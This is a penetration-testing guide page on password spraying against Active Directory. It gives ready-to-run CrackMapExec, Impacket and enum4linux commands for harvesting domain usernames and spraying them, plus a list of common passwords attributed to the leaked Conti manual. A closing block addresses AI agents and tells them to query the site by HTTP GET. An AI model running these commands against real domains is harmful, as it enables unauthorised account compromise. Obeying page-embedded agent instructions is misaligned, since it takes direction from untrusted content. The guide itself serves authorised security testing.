# Password Spraying This section contains some of my methodology and tips for performing password spraying attacks against Active Directory. Before spraying, I highly recommend that you first [enumerate the password policy](/pentesting/infrastructure/active-directory/password-policy.md) on the domain so that you don't lock out accounts. If you are looking to password spray external services to gain initial access, refer to the [Fortress section](/pentesting/fortress.md) of this GitBook. ### Get List of Users ```bash # Get List of Users with CrackMapExec via RID Cycling (Unauthenticated) crackmapexec smb $dc -u '' -p '' --users crackmapexec smb $dc -u '' -p '' --groups # Get List of Users with CrackMapExec via RID Cycling crackmapexec smb $dc -u $username -p $password --users # Get List of Users with Impacket GetADUsers.py $domain/$username:$password -all -dc-ip $dc # Get List of Users with Enum4linux enum4linux $dc -u $username -p $password -U # Sort Usernames Obtained from Enum4Linux cat usernameenum.txt | grep "user" | awk {'print $1'} | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txt ``` ### Spraying ```bash # Spray with CrackMapExec crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success ``` ### Password List These passwords were referenced from the published [Conti manual](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) and often work. This should be an unspoken rule, but ensure that your list is tailored for each engagement (year, month, etc). ```bash Password1 Hello123 password Welcome1 Acme@1 training Password123 job12345 food1234 June2022 July2022 August22 August2022 Summer22 Summer2022 June2022! July2022! August22! August2022! Summer22! Summer2022! ``` ### References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/password-spraying.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.